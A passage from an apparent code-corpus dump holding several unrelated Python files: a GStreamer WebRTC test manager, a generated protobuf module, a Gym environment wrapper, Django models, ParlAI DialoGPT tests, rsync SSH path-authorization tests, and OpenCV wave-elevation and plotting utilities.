    "offer_answer" : ['initiator', 'bundle'],
    "vp8_send_stream" : ['initiator', 'bundle'],
    "open_data_channel" : ['initiator', 'bundle'],
    "send_data_channel_string" : ['initiator', 'bundle'],
}

# Things that don't work for some reason or another.
# Each entry is (test-name regex, human-readable reason).
DEFAULT_BLACKLIST = [
    (r"webrtc\.firefox\.local\..*offer_answer",
     "Firefox doesn't like a SDP without any media"),
    (r"webrtc.*remote.*vp8_send_stream",
     "We can't match payload types with a remote offer and a sending stream"),
    (r"webrtc.*\.balanced_.*",
     "webrtcbin doesn't implement bundle-policy=balanced"),
    (r"webrtc.*\.none_bundle.*",
     "Browsers want a BUNDLE group if in max-bundle mode"),
]
class MutableInt(object):
    """A boxed integer: lets a class-level counter be mutated in place and
    shared by every GstWebRTCTest instance."""

    def __init__(self, value):
        self.value = value
class GstWebRTCTest(GstValidateTest):
    """One validate test: runs webrtc_validate.py against a browser peer,
    with a per-test websocket signalling server it launches itself."""

    # Ports already handed to signalling servers, so concurrent tests do not
    # collide while their servers are alive.
    __used_ports = set()
    # Next free peer id; boxed in MutableInt so the counter is shared across
    # all instances.
    __last_id = MutableInt(10)

    @classmethod
    def __get_open_port(cls):
        """Reserve and return a TCP port that is currently free and not
        already claimed by another test."""
        while True:
            # hackish trick from
            # http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python?answertab=votes#tab-top
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind(("", 0))
            port = s.getsockname()[1]
            if port not in cls.__used_ports:
                cls.__used_ports.add(port)
                s.close()
                return port
            s.close()

    @classmethod
    def __get_available_peer_id(cls):
        """Return the next peer id; the browser side uses the returned id + 1."""
        # each connection uses two peer ids
        peerid = cls.__last_id.value
        cls.__last_id.value += 2

        return peerid

    def __init__(self, classname, tests_manager, scenario, browser, scenario_override_includes=None, timeout=DEFAULT_TIMEOUT):
        super().__init__("python3",
                         classname,
                         tests_manager.options,
                         tests_manager.reporter,
                         timeout=timeout,
                         scenario=scenario)
        self.webrtc_server = None
        # Directory of this file, used to locate the signalling server,
        # webrtc_validate.py and the browser HTML page relative to it.
        filename = inspect.getframeinfo (inspect.currentframe ()).filename
        self.current_file_path = os.path.dirname (os.path.abspath (filename))
        self.certdir = None
        self.browser = browser
        self.scenario_override_includes = scenario_override_includes

    def launch_server(self):
        """Generate TLS certificates and start the websocket signalling
        server; blocks until it accepts connections.

        Returns the server command line (joined) for logging purposes.
        """
        if self.options.redirect_logs == 'stdout':
            self.webrtcserver_logs = sys.stdout
        elif self.options.redirect_logs == 'stderr':
            self.webrtcserver_logs = sys.stderr
        else:
            self.webrtcserver_logs = open(self.logfile + '_webrtcserver.log', 'w+')
            self.extra_logfiles.add(self.webrtcserver_logs.name)

        # The signalling server needs a self-signed certificate for wss://.
        generate_certs_location = os.path.join(self.current_file_path, "..", "..", "..", "signalling", "generate_cert.sh")
        self.certdir = tempfile.mkdtemp()
        command = [generate_certs_location, self.certdir]

        server_env = os.environ.copy()

        subprocess.run(command,
                       stderr=self.webrtcserver_logs,
                       stdout=self.webrtcserver_logs,
                       env=server_env)

        self.server_port = self.__get_open_port()

        server_location = os.path.join(self.current_file_path, "..", "..", "..", "signalling", "simple_server.py")
        command = [server_location, "--cert-path", self.certdir, "--addr", "127.0.0.1", "--port", str(self.server_port)]

        self.webrtc_server = subprocess.Popen(command,
                                              stderr=self.webrtcserver_logs,
                                              stdout=self.webrtcserver_logs,
                                              env=server_env)
        # Poll until the signalling server is actually listening before the
        # test (and the browser) try to connect to it.
        while True:
            s = socket.socket()
            try:
                s.connect((("127.0.0.1", self.server_port)))
                break
            except ConnectionRefusedError:
                time.sleep(0.1)
                continue
            finally:
                s.close()

        return ' '.join(command)

    def build_arguments(self):
        """Assemble the webrtc_validate.py command line: signalling server
        URL, browser choice, HTML page for the browser peer, and the two
        peer ids (browser = gst id + 1)."""
        gst_id = self.__get_available_peer_id()
        web_id = gst_id + 1

        self.add_arguments(os.path.join(self.current_file_path, '..', 'webrtc_validate.py'))
        self.add_arguments('--server')
        self.add_arguments("wss://127.0.0.1:%s" % (self.server_port,))
        self.add_arguments('--browser')
        self.add_arguments(self.browser)
        self.add_arguments("--html-source")
        html_page = os.path.join(self.current_file_path, '..', 'web', 'single_stream.html')
        html_params = '?server=127.0.0.1&port=' + str(self.server_port) + '&id=' + str(web_id)
        self.add_arguments("file://" + html_page + html_params)
        self.add_arguments("--name")
        self.add_arguments(self.classname)
        self.add_arguments('--peer-id')
        self.add_arguments(str(web_id))
        self.add_arguments(str(gst_id))

    def close_logfile(self):
        super().close_logfile()
        if not self.options.redirect_logs:
            self.webrtcserver_logs.close()

    def process_update(self):
        res = super().process_update()
        if res:
            # Test finished: tear down the signalling server, free its port
            # and remove the temporary certificate directory.
            kill_subprocess(self, self.webrtc_server, DEFAULT_TIMEOUT)
            self.__used_ports.remove(self.server_port)
            if self.certdir:
                shutil.rmtree(self.certdir, ignore_errors=True)

        return res

    def get_subproc_env(self):
        """Extend GST_VALIDATE_SCENARIOS_PATH with each override subdirectory
        (if it exists) so included override scenarios can be found."""
        env = super().get_subproc_env()
        if not self.scenario_override_includes:
            return env

        # this feels gross...
        paths = env.get('GST_VALIDATE_SCENARIOS_PATH', '').split(os.pathsep)
        new_paths = []
        for p in paths:
            new_paths.append(p)
            for override_path in self.scenario_override_includes:
                new_p = os.path.join(p, override_path)
                if os.path.exists (new_p):
                    new_paths.append(new_p)
        env['GST_VALIDATE_SCENARIOS_PATH'] = os.pathsep.join(new_paths)

        return env
class GstWebRTCTestsManager(TestsManager):
    """Registers one GstWebRTCTest per (browser, scenario, override combo)."""

    scenarios_manager = ScenarioManager()
    name = "webrtc"

    def __init__(self):
        super(GstWebRTCTestsManager, self).__init__()
        self.loading_testsuite = self.name
        self._scenarios = []

    def add_scenarios(self, scenarios):
        """Add one scenario name or a list of them; duplicates are dropped
        (note: the list(set(...)) dedup does not preserve insertion order)."""
        if isinstance(scenarios, list):
            self._scenarios.extend(scenarios)
        else:
            self._scenarios.append(scenarios)

        self._scenarios = list(set(self._scenarios))

    def set_scenarios(self, scenarios):
        """Replace the current scenario list with *scenarios*."""
        self._scenarios = []
        self.add_scenarios(scenarios)

    def get_scenarios(self):
        return self._scenarios

    def populate_testsuite(self):
        self.add_scenarios (DEFAULT_SCENARIOS)
        self.set_default_blacklist(DEFAULT_BLACKLIST)

    def list_tests(self):
        """Build (once) and return the full list of tests: for every browser
        and scenario, one test per combination of supported overrides."""
        if self.tests:
            return self.tests

        scenarios = [(scenario_name, self.scenarios_manager.get_scenario(scenario_name))
                     for scenario_name in self.get_scenarios()]

        for browser in DEFAULT_BROWSERS:
            for name, scenario in scenarios:
                if not scenario:
                    self.warning("Could not find scenario %s" % name)
                    continue
                if not SCENARIO_OVERRIDES_SUPPORTED[name]:
                    # no override choices supported
                    classname = browser + '.' + name
                    print ("adding", classname)
                    self.add_test(GstWebRTCTest(classname, self, scenario, browser))
                else:
                    # One test per element of the cartesian product of all
                    # supported override choices for this scenario.
                    for overrides in itertools.product(*[OVERRIDE_CHOICES[c] for c in SCENARIO_OVERRIDES_SUPPORTED[name]]):
                        oname = '.'.join (overrides)
                        opaths = [SCENARIO_OVERRIDES[p] for p in overrides]
                        classname = browser + '.' + oname + '.' + name
                        print ("adding", classname)
                        self.add_test(GstWebRTCTest(classname, self, scenario, browser, opaths))

        return self.tests
| StarcoderdataPython |
3363041 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/api/system_parameter.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/api/system_parameter.proto",
package="google.api",
syntax="proto3",
serialized_options=b"\n\016com.google.apiB\024SystemParameterProtoP\001ZEgoogle.golang.org/genproto/googleapis/api/serviceconfig;serviceconfig\242\002\004GAPI",
serialized_pb=b'\n!google/api/system_parameter.proto\x12\ngoogle.api"B\n\x10SystemParameters\x12.\n\x05rules\x18\x01 \x03(\x0b\x32\x1f.google.api.SystemParameterRule"X\n\x13SystemParameterRule\x12\x10\n\x08selector\x18\x01 \x01(\t\x12/\n\nparameters\x18\x02 \x03(\x0b\x32\x1b.google.api.SystemParameter"Q\n\x0fSystemParameter\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x13\n\x0bhttp_header\x18\x02 \x01(\t\x12\x1b\n\x13url_query_parameter\x18\x03 \x01(\tBv\n\x0e\x63om.google.apiB\x14SystemParameterProtoP\x01ZEgoogle.golang.org/genproto/googleapis/api/serviceconfig;serviceconfig\xa2\x02\x04GAPIb\x06proto3',
)
_SYSTEMPARAMETERS = _descriptor.Descriptor(
name="SystemParameters",
full_name="google.api.SystemParameters",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="rules",
full_name="google.api.SystemParameters.rules",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=49,
serialized_end=115,
)
_SYSTEMPARAMETERRULE = _descriptor.Descriptor(
name="SystemParameterRule",
full_name="google.api.SystemParameterRule",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="selector",
full_name="google.api.SystemParameterRule.selector",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="parameters",
full_name="google.api.SystemParameterRule.parameters",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=117,
serialized_end=205,
)
_SYSTEMPARAMETER = _descriptor.Descriptor(
name="SystemParameter",
full_name="google.api.SystemParameter",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.api.SystemParameter.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="http_header",
full_name="google.api.SystemParameter.http_header",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="url_query_parameter",
full_name="google.api.SystemParameter.url_query_parameter",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=207,
serialized_end=288,
)
_SYSTEMPARAMETERS.fields_by_name["rules"].message_type = _SYSTEMPARAMETERRULE
_SYSTEMPARAMETERRULE.fields_by_name["parameters"].message_type = _SYSTEMPARAMETER
DESCRIPTOR.message_types_by_name["SystemParameters"] = _SYSTEMPARAMETERS
DESCRIPTOR.message_types_by_name["SystemParameterRule"] = _SYSTEMPARAMETERRULE
DESCRIPTOR.message_types_by_name["SystemParameter"] = _SYSTEMPARAMETER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
SystemParameters = _reflection.GeneratedProtocolMessageType(
"SystemParameters",
(_message.Message,),
{
"DESCRIPTOR": _SYSTEMPARAMETERS,
"__module__": "google.api.system_parameter_pb2"
# @@protoc_insertion_point(class_scope:google.api.SystemParameters)
},
)
_sym_db.RegisterMessage(SystemParameters)
SystemParameterRule = _reflection.GeneratedProtocolMessageType(
"SystemParameterRule",
(_message.Message,),
{
"DESCRIPTOR": _SYSTEMPARAMETERRULE,
"__module__": "google.api.system_parameter_pb2"
# @@protoc_insertion_point(class_scope:google.api.SystemParameterRule)
},
)
_sym_db.RegisterMessage(SystemParameterRule)
SystemParameter = _reflection.GeneratedProtocolMessageType(
"SystemParameter",
(_message.Message,),
{
"DESCRIPTOR": _SYSTEMPARAMETER,
"__module__": "google.api.system_parameter_pb2"
# @@protoc_insertion_point(class_scope:google.api.SystemParameter)
},
)
_sym_db.RegisterMessage(SystemParameter)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| StarcoderdataPython |
1705320 | import sys
import math
import gym
from gym import spaces, logger
from gym.utils import seeding
import numpy as np
from feh_simulator.simulator import Simulator
class fehEnv(gym.Env):
    """OpenAI Gym wrapper around the Fire Emblem Heroes battle Simulator."""

    def __init__(self):
        # Board dimensions used by the simulator's map.
        self.width = 6
        self.height = 8
        # input are row, col, verbose, difficulty
        self.simulator = Simulator()
        self.viewer = None
        self.seed()

    def seed(self, seed=None):
        """Seed the environment's RNG; returns the list of seeds used."""
        self.np_random, seed = seeding.np_random(seed)
        return [seed]

    def step(self, action):
        """Apply *action* and return (state, reward, done) from the simulator."""
        # BUG FIX: the original referenced the undefined global `simulator`
        # (NameError at runtime); the action space comes from this instance.
        action_space = self.simulator.get_action_space()
        assert action_space.contains(action), "%r (%s) invalid" % (action, type(action))
        s, r, d = self.simulator.step(action)
        return s, r, d

    def render(self, mode='human'):
        """Render the environment; returns an RGB array when mode == 'rgb_array'."""
        screen_width = 600
        screen_height = 400
        if self.viewer is None:
            from gym.envs.classic_control import rendering
            self.viewer = rendering.Viewer(screen_width, screen_height)
        # BUG FIX: `mode` was an undefined name in the original; it is now a
        # parameter following the standard gym render(mode=...) convention
        # (backward-compatible default).
        return self.viewer.render(return_rgb_array=(mode == 'rgb_array'))

    def reset(self):
        """Reset the simulator; returns its (state, reward, done) triple."""
        s, r, d = self.simulator.reset()
        return s, r, d
def main(argv):
    """Smoke test: construct the environment, reset it once, and render it."""
    environment = fehEnv()
    state, reward, done = environment.reset()
    environment.render()


if __name__ == "__main__":
    main(sys.argv)
| StarcoderdataPython |
3354658 | <gh_stars>0
from django.conf import settings
from django.db import models
class Category(models.Model):
"Generated Model"
name = models.CharField(
max_length=255,
)
icon = models.URLField()
description = models.TextField(
null=True,
blank=True,
)
is_recurring = models.BooleanField(
null=True,
blank=True,
)
class Subcategory(models.Model):
"Generated Model"
name = models.CharField(
max_length=255,
)
category = models.ForeignKey(
"task_category.Category",
on_delete=models.CASCADE,
related_name="subcategory_category",
)
description = models.TextField(
null=True,
blank=True,
)
# Create your models here.
| StarcoderdataPython |
4841063 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import parlai.utils.testing as testing_utils
from parlai.core.agents import create_agent
@testing_utils.skipUnlessGPU
class TestDialogptModel(unittest.TestCase):
    """
    Test of DialoGPT model.
    """

    def _test_batchsize(self, batchsize, add_start_token):
        """Assert that generations are identical whether the utterances are
        processed one at a time or batched with the given batchsize."""
        utterances = [
            'How is your day so far?',
            'I hope you you have a good day.',
            "Nice to meet you. My name is John. ",
            "I've got a feeling we're not in Kansas anymore.",
        ]
        opt = {
            'model': 'hugging_face/dialogpt',
            'gpt2_size': 'small',
            'text_truncate': 100,
            'label_truncate': 20,
            'beam_min_length': 1,
            'inference': 'beam',
            'beam_size': 1,
            'add_special_tokens': True,
            'batchsize': batchsize,
            'add_start_token': add_start_token,
        }
        dialogpt = create_agent(opt)

        # One-at-a-time generations (reference results).
        results_single = []
        agents = [dialogpt.clone() for _ in utterances]
        for u, a in zip(utterances, agents):
            a.observe({'text': u, 'episode_done': True})
            generation = a.act()['text']
            results_single.append(generation)

        # Batched generations must match the single-item ones exactly.
        results_batched = []
        for idx in range(len(utterances) // batchsize):
            agents = [dialogpt.clone() for _ in range(batchsize)]
            batch = utterances[idx * batchsize : (idx + 1) * batchsize]
            obs = []
            for i, a in enumerate(agents):
                obs.append(a.observe({'text': batch[i], 'episode_done': True}))
            generations = [x['text'] for x in dialogpt.batch_act(obs)]
            results_batched += generations
        assert results_single == results_batched

    def test_batchsize(self):
        """
        Ensures dialogpt provides the same generation results regardless of batchsize.
        """
        # Test throwing the RuntimeError with add_special_tokens = False and batchsize > 1
        with self.assertRaises(RuntimeError):
            create_agent(
                {
                    'model': 'hugging_face/dialogpt',
                    'add_special_tokens': False,
                    'batchsize': 2,
                }
            )
        for batchsize in [1, 2, 4]:
            for add_start_token in [True, False]:
                with self.subTest(
                    f'test_batchsize with bs={batchsize} and add_start_token={add_start_token}'
                ):
                    self._test_batchsize(batchsize, add_start_token)

    def test_start_token(self):
        """
        Test RuntimeError is thrown when add_start_token = True and yet add_special_tokens = False
        """
        with self.assertRaises(RuntimeError):
            create_agent(
                {
                    'model': 'hugging_face/dialogpt',
                    'add_special_tokens': False,
                    'add_start_token': True,
                }
            )

    def test_nospecialtok(self):
        """
        Test generation consistency for off-the-shelf dialogpt models.
        """
        # (input, expected generation) pairs for the pretrained model.
        test_cases = [
            ("What a nice weather!", "I'm in the UK and it's raining here."),
            ("Nice to meet you!", "Hello! I'm from the future!"),
        ]
        opt = {
            'model': 'hugging_face/dialogpt',
            'gpt2_size': 'small',
            'text_truncate': 100,
            'label_truncate': 20,
            'beam_min_length': 1,
            'inference': 'beam',
            'beam_size': 1,
            'add_special_tokens': False,
            'batchsize': 1,
        }
        dialogpt = create_agent(opt)
        for text, label in test_cases:
            dialogpt.observe({'text': text, 'episode_done': True})
            response = dialogpt.act()
            assert response['text'] == label

    @testing_utils.retry(ntries=3, log_retry=True)
    def test_dialogpt(self):
        """
        Checks that DialoGPT gets a certain performance on the integration test task.
        """
        valid, test = testing_utils.train_model(
            dict(
                task='integration_tests:overfit',
                model='hugging_face/dialogpt',
                add_special_tokens=True,
                add_start_token=True,
                optimizer='adam',
                learningrate=1e-3,
                batchsize=4,
                num_epochs=100,
                validation_every_n_epochs=5,
                validation_metric='ppl',
                short_final_eval=True,
                skip_generation=True,
            )
        )
        self.assertLessEqual(valid['ppl'], 4.0)
        self.assertLessEqual(test['ppl'], 4.0)


if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
1719351 | '''Test rsync SSH helper'''
import pytest
from hazelsync.ssh import Unauthorized
from hazelsync.ssh.rsync import RsyncSsh
def test_authorize_allow():
    """A command targeting a path on the allow-list is authorized silently."""
    command = 'rsync --server --sender -logDtpArRe.iLsfxC --numeric-ids . /opt/data'
    RsyncSsh(dict(allowed_paths=['/opt/data'])).authorize(command)
def test_authorize_reject():
    """A command targeting a path outside the allow-list raises Unauthorized."""
    command = 'rsync --server --sender -logDtpArRe.iLsfxC --numeric-ids . /opt/data1'
    ssh_helper = RsyncSsh(dict(allowed_paths=['/opt/data']))
    with pytest.raises(Unauthorized):
        ssh_helper.authorize(command)
def test_authorize_string_path():
    """allowed_paths may be a single string rather than a list of paths."""
    command = 'rsync --server --sender -logDtpArRe.iLsfxC --numeric-ids . /opt/data'
    RsyncSsh(dict(allowed_paths='/opt/data')).authorize(command)
| StarcoderdataPython |
3363661 | <filename>transom-elevation/elevations_utils.py
import cv2
import numpy as np
import csv
def corrected_perspective(image):
"""Return image with corrected perspective"""
# convert BGR to RGB
img = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# project image to vertical plane
# this is based on first frame of TR5-R1.94A1V
# camera position shouldn't change between runs
# getPerspectiveTransform uses four points that *should* be a rectangle
# and four points that *make* a rectangle, to which the original points
# are mapped by warpPerspective
initial_rect = np.float32([[732, 480],
[1151, 483],
[1144, 576],
[741, 572]])
final_rect = np.float32([[732, 480],
[1151, 480],
[1151, 576],
[732, 576]])
matrix = cv2.getPerspectiveTransform(initial_rect, final_rect)
proj = cv2.warpPerspective(img, matrix, (1920, 1080))
return proj
def masked_image(proj_image, lower_range, upper_range):
    """Return a binary mask of pixels whose HSV value lies inside the range."""
    # HSV makes hue-based matching far easier than RGB.
    hsv_image = cv2.cvtColor(proj_image, cv2.COLOR_RGB2HSV)
    return cv2.inRange(hsv_image, lower_range, upper_range)
def largest_contour(cropped_image):
    """Return the contour enclosing the largest area in the (grayscale) image."""
    blurred = cv2.GaussianBlur(cropped_image, (5, 5), 0)
    # Adaptive threshold "blacks out" everything outside the mask before the
    # contour search.
    thresholded = cv2.adaptiveThreshold(blurred, 255, 1, 1, 11, 2)
    contours, _hierarchy = cv2.findContours(thresholded,
                                            cv2.RETR_TREE,
                                            cv2.CHAIN_APPROX_SIMPLE)
    # Largest internal area first.
    ranked = sorted(contours, key=cv2.contourArea, reverse=True)
    return ranked[0]
def elevations(transom_contour, waterline_contour, data_path):
    """Return scaled wave elevations at seven buttocks across the transom.

    :transom_contour: contour of the transom (pixel coordinates)
    :waterline_contour: contour of the waterline
    :data_path: output file path; its name (T1/T4/T5) selects hull geometry
    """
    # we have waterline_contour and transom_contour
    # find top left and right corners of transom
    # split vessel into buttocks
    # find most vertical waterline point at each buttock
    # scale and find coordinates of waterline relative to transom

    # find boundaries of transom to define "box"
    transom_l = max(transom_contour,
                    key=lambda r: r[0][0])[0][0]
    transom_r = min(transom_contour,
                    key=lambda r: r[0][0])[0][0]
    transom_b = max(transom_contour,
                    key=lambda r: r[0][1])[0][1]
    transom_t = min(transom_contour,
                    key=lambda r: r[0][1])[0][1]
    # find top corners of transom by distance from top corners of "box"
    transom_tl = min(transom_contour,
                     key=lambda r: (r[0][0] - transom_l) ** 2 + (r[0][1] - transom_t) ** 2)[0]
    transom_tr = min(transom_contour,
                     key=lambda r: (r[0][0] - transom_r) ** 2 + (r[0][1] - transom_t) ** 2)[0]
    # find x coordinates of edges of waterline by distance from bottom corners of "box"
    waterline_l = min(waterline_contour,
                      key=lambda r: (r[0][0] - transom_l) ** 2 + (r[0][1] - transom_b) ** 2)[0][0]
    waterline_r = min(waterline_contour,
                      key=lambda r: (r[0][0] - transom_r) ** 2 + (r[0][1] - transom_b) ** 2)[0][0]
    # split vessel into buttocks
    # currently just splits space between edges of waterline into 6 equal portions
    waterline_span = waterline_r - waterline_l
    buttocks = []
    for b in range(7):
        buttocks.append(waterline_l + (b / 6) * waterline_span)
    # find raw wave heights at each buttock
    # contours aren't defined at every x coordinate, so at each buttock we
    # search the 40 nearest waterline points (by x distance), pick the two
    # closest to (buttock, top of transom), and interpolate between them.
    raw_wave_heights = []
    for x in buttocks:
        heights_search = sorted(waterline_contour, key=lambda r: abs(x - r[0][0]))[:40]
        sorted_heights = sorted(heights_search, key=lambda r: r[0][1] ** 2 + (r[0][0]-x) ** 2)
        heights_x = [sorted_heights[0][0][0], sorted_heights[1][0][0]]
        heights_y = [sorted_heights[0][0][1], sorted_heights[1][0][1]]
        # NOTE(review): np.interp expects increasing xp; heights_x is not
        # sorted here — confirm the two support points are always ordered.
        height = np.interp(x, heights_x, heights_y)
        raw_wave_heights.append(height)
    # find scaled wave heights
    scale = 0.23 / (transom_tr[0] - transom_tl[0])  # beam is 0.23 m
    transom_height = (transom_tr[1] + transom_tl[1]) / 2
    # BUG FIX: was `data_path.find("T1") > 0`, which misses a match at index 0;
    # substring membership is the clear intent and matches get_elevations().
    if "T1" in data_path or "T4" in data_path:
        transom_to_waterline = 0.10 / scale  # T1 or T4
    elif "T5" in data_path:
        transom_to_waterline = 0.09 / scale  # T5
    else:
        # BUG FIX: an unrecognised hull name previously left
        # transom_to_waterline unbound (UnboundLocalError below); default to
        # the T5 draft, mirroring the catch-all branch in get_elevations().
        transom_to_waterline = 0.09 / scale
    unscaled_wave_heights = [h - (transom_height + transom_to_waterline)
                             for h in raw_wave_heights]
    wave_heights = [-h * scale for h in unscaled_wave_heights]
    # make corrections for hulls
    if "T1" in data_path:
        wave_heights = [0.1 - (h / 2) for h in wave_heights]
    elif "T4" in data_path:
        wave_heights = [0.175 - h for h in wave_heights]
    else:  # assume T5
        wave_heights = [0.1 - (h / 2) for h in wave_heights]
    return wave_heights
def test_mask(frame):
    """Visual check of the HSV masks on a single frame.

    Reads ../images/frame<frame>.jpg, draws the detected transom and waterline
    contours on the perspective-corrected image, and writes the result to
    ../images/testing/frame<frame>test.jpg.
    """
    image_name = "../images/frame%d.jpg" % frame
    img = cv2.imread(image_name)
    # this is temporary
    # replace with whatever mask you need to test
    tsm_low = np.array([18,150,130])
    tsm_high = np.array([24,255,215])
    wtl_low = np.array([22,102,105])
    wtl_high = np.array([40,255,200])
    # standard steps for finding contours
    prj = corrected_perspective(img)
    tsm = masked_image(prj, tsm_low, tsm_high)
    transom = largest_contour(tsm)
    wtl = masked_image(prj, wtl_low, wtl_high)
    waterline = largest_contour(wtl)
    # draw contours on projected image
    cv2.drawContours(prj, [transom], 0, 0, 2)
    cv2.drawContours(prj, [waterline], 0, 0, 2)
    # NOTE(review): the converted image is not assigned back, so this
    # cvtColor call has no effect on the saved output — confirm whether
    # `prj = cv2.cvtColor(...)` was intended.
    cv2.cvtColor(prj, cv2.COLOR_BGR2RGB)
    # output image for viewing
    cv2.imwrite("../images/testing/frame%dtest.jpg" % frame, prj)
def write_elevations(heights, data_path):
    """Append one row of elevation values to the CSV file at *data_path*."""
    with open(data_path, 'a', newline='') as data_file:
        csv.writer(data_file).writerows([heights])
def get_elevations(data_path):
    """Find and append the elevation time history for each frame in ../images.

    :data_path: CSV output path; its name (T1/T4/T5) selects the HSV masks
    """
    for frame in range(1500):
        image_name = "../images/frame%d.jpg" % frame
        img = cv2.imread(image_name)
        # switch for hull masks
        # TODO: T4 mask still needs work
        # BUG FIX: was `data_path.find("T1") > 1`, which (a) misses a match at
        # index 0 or 1 and (b) disagreed with the check in elevations();
        # substring membership is the clear intent.
        if "T1" in data_path:
            tsm_low = np.array([21,147,130])
            tsm_high = np.array([35,255,200])
            wtl_low = np.array([29,116,105])
            wtl_high = np.array([43,255,224])
        elif "T4" in data_path:
            tsm_low = np.array([18,150,130])
            tsm_high = np.array([24,255,215])
            wtl_low = np.array([22,102,105])
            wtl_high = np.array([40,255,200])
        elif "T5" in data_path:
            tsm_low = np.array([26,150,130])
            tsm_high = np.array([30,255,215])
            wtl_low = np.array([30,204,105])
            wtl_high = np.array([40,255,180])
        else: # catch any other hulls in filename
            tsm_low = np.array([26,150,130])
            tsm_high = np.array([30,255,215])
            wtl_low = np.array([30,204,105])
            wtl_high = np.array([40,255,224])
        # standard steps for finding contours
        prj = corrected_perspective(img)
        tsm = masked_image(prj, tsm_low, tsm_high)
        transom = largest_contour(tsm)
        wtl = masked_image(prj, wtl_low, wtl_high)
        waterline = largest_contour(wtl)
        heights = elevations(transom, waterline, data_path)
        write_elevations(heights, data_path)
    print("Video processing complete.")
| StarcoderdataPython |
3244643 | <gh_stars>0
# -----------------------------------------------------------------------------------------
# Plot functions for MILP MESPP RISK-AWARE
# -----------------------------------------------------------------------------------------
import os
from matplotlib import pyplot as plt
# TODO IMPORT FROM THE ORIGINAL MILP_MESPP REPO
def compose_and_clean(path_to_folder: str):
    """Render the saved frames in *path_to_folder* into a video, then delete them."""
    compose_video(path_to_folder)
    delete_frames(path_to_folder)
def compose_video(path_to_folder: str):
    """Stitch the folder's frame_%04d.png images into an mp4 via ffmpeg (20 fps)."""
    print("Composing video")
    ffmpeg_cmd = (
        "ffmpeg -r 20 -f image2 -i " + path_to_folder
        + "/frame_%04d.png -vcodec libx264 -crf 18 -pix_fmt yuv420p "
        + path_to_folder + "/a_no_sync.mp4 -y"
    )
    os.system(ffmpeg_cmd)
    print("Video is done")
def delete_frames(path_to_folder: str, key_name='frame'):
    """Delete the PNG frames (files named key_name*.png) used to build the video."""
    for entry in os.listdir(path_to_folder):
        if entry.startswith(key_name) and entry.endswith('.png'):
            os.remove(path_to_folder + "/" + entry)
    print("Frames were deleted")
    return
def define_fonts():
    """Return the four matplotlib font dicts used for plot text.

    0: title (dark red, bold, 13pt), 1: subtitle (dark blue, bold, 12pt),
    2: regular text (gray, 9pt), 3: regular text (black, 9pt).
    """
    return {
        # title - red and bold
        0: {'family': 'serif', 'color': 'darkred', 'weight': 'bold', 'size': 13,
            'horizontalalignment': 'center'},
        # subtitle - dark blue and bold
        1: {'family': 'serif', 'color': 'darkblue', 'weight': 'bold', 'size': 12,
            'horizontalalignment': 'center'},
        # regular text - gray
        2: {'family': 'serif', 'color': 'darkgray', 'weight': 'normal', 'size': 9,
            'horizontalalignment': 'center'},
        # regular text - black
        3: {'family': 'serif', 'color': 'black', 'weight': 'normal', 'size': 9,
            'horizontalalignment': 'center'},
    }
def define_fonts2():
    """Like define_fonts(), but fonts 2 and 3 are bold black, size 11."""
